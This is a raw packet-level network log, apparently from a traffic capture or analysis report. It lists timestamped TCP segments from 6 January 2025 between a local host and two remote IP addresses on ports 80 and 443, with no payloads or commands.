                                                                                                                                                                        Jan 6, 2025 07:53:16.101332903 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101336002 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.101361990 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101370096 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.101373911 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101402044 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.101453066 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101464987 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101475954 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101512909 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.101530075 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101546049 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101564884 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.101674080 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101700068 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101707935 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.101830959 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101841927 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101850986 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101866961 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.101888895 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.101912022 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101922989 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101948977 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.101963997 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101974964 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.101984978 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102011919 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.102019072 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102030039 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102054119 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.102089882 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102101088 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102127075 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.102277994 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102288961 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102299929 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102318048 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.102336884 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.102354050 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102365017 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102374077 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102385998 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102406025 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.102421999 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.102468967 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102479935 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.102516890 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.147700071 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147741079 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147752047 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147763014 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147778988 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147788048 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.147790909 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147802114 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147813082 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147814035 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.147846937 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.147861958 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147872925 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147883892 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147916079 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.147938967 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147949934 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147959948 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.147973061 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.147989988 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.148170948 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148183107 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148192883 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148205996 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.148226976 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148238897 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148248911 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148260117 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148261070 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.148276091 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.148468018 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148480892 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148492098 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148499966 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.148509026 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148520947 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148530006 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.148530960 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148550034 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148560047 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.148580074 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.148705959 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148716927 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148726940 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148736954 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148739100 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.148761034 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148766041 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.148772955 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148783922 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.148818016 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.148997068 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.149008036 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.149018049 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.149034023 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.149045944 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.149059057 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.149144888 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.149156094 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.149166107 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.149175882 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.149177074 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.149199009 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.149298906 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.149310112 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.149319887 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.149329901 CET8049739147.124.216.113192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.149341106 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.149359941 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.157424927 CET4973980192.168.2.4147.124.216.113
                                                                                                                                                                        Jan 6, 2025 07:53:16.858911991 CET49743443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:16.858943939 CET44349743166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.860402107 CET49743443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:16.913203001 CET49743443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:16.913245916 CET44349743166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.913392067 CET49743443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:16.969407082 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:16.969466925 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:16.969619989 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:16.972264051 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:16.972290993 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.199783087 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.199848890 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:18.201833963 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:18.201854944 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.202090025 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.249455929 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:18.266236067 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:18.311340094 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.590692997 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.590743065 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.590750933 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.590810061 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:18.590838909 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.644458055 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:18.816050053 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.816063881 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.816107035 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.816123962 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.816133022 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.816135883 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:18.816157103 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:18.816162109 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.816168070 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.816185951 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:18.817193031 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.817223072 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:18.817240000 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.817260027 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:18.818185091 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.818192959 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.818411112 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:18.818427086 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:18.822067022 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.042195082 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.042211056 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.042320013 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.042675972 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.042684078 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.043395042 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.043422937 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.043447018 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.043457985 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.043467999 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.043587923 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.043598890 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.043657064 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.044433117 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.044600964 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.045308113 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.045351982 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.045381069 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.045393944 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.045417070 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.046778917 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.267950058 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.267966032 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.268198967 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.268251896 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.268464088 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.268594027 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.268677950 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.268951893 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.269054890 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.269483089 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.269608021 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.269680977 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.269748926 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.270308018 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.270471096 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.270499945 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.270518064 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.270538092 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.270627975 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.270682096 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.270682096 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.270690918 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.270802975 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.271442890 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.271513939 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.271610022 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.271689892 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.272247076 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.272316933 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.356849909 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.356946945 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.356975079 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.356996059 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.357009888 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.357017040 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.357599974 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.357614994 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.358378887 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.494106054 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.494220972 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.494357109 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.494435072 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.494625092 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.494687080 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.494927883 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.495032072 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.495088100 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.495197058 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.495389938 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.495518923 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.495683908 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.495740891 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.498883963 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.498927116 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.498954058 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.498970985 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.498996019 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.499063969 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.499397993 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.499447107 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.499473095 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.499483109 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.499504089 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.499625921 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.499701977 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.499789000 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.500102043 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.500185966 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.500247955 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.500344038 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.500428915 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.500471115 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.500483036 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.500494957 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.500531912 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.500531912 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.581382990 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.581468105 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.581532001 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.581625938 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.581861973 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.581945896 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.582007885 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.582115889 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.582259893 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.582370996 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.582598925 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.582650900 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.582901955 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.582966089 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.582992077 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.583003998 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.583025932 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.583179951 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.583278894 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.583288908 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.583399057 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.583475113 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.583508968 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.583529949 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.583539963 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.583560944 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.583684921 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.583709002 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.583714008 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.583733082 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.583800077 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.583920956 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.584047079 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.719894886 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.719961882 CET49744443192.168.2.4166.62.27.188
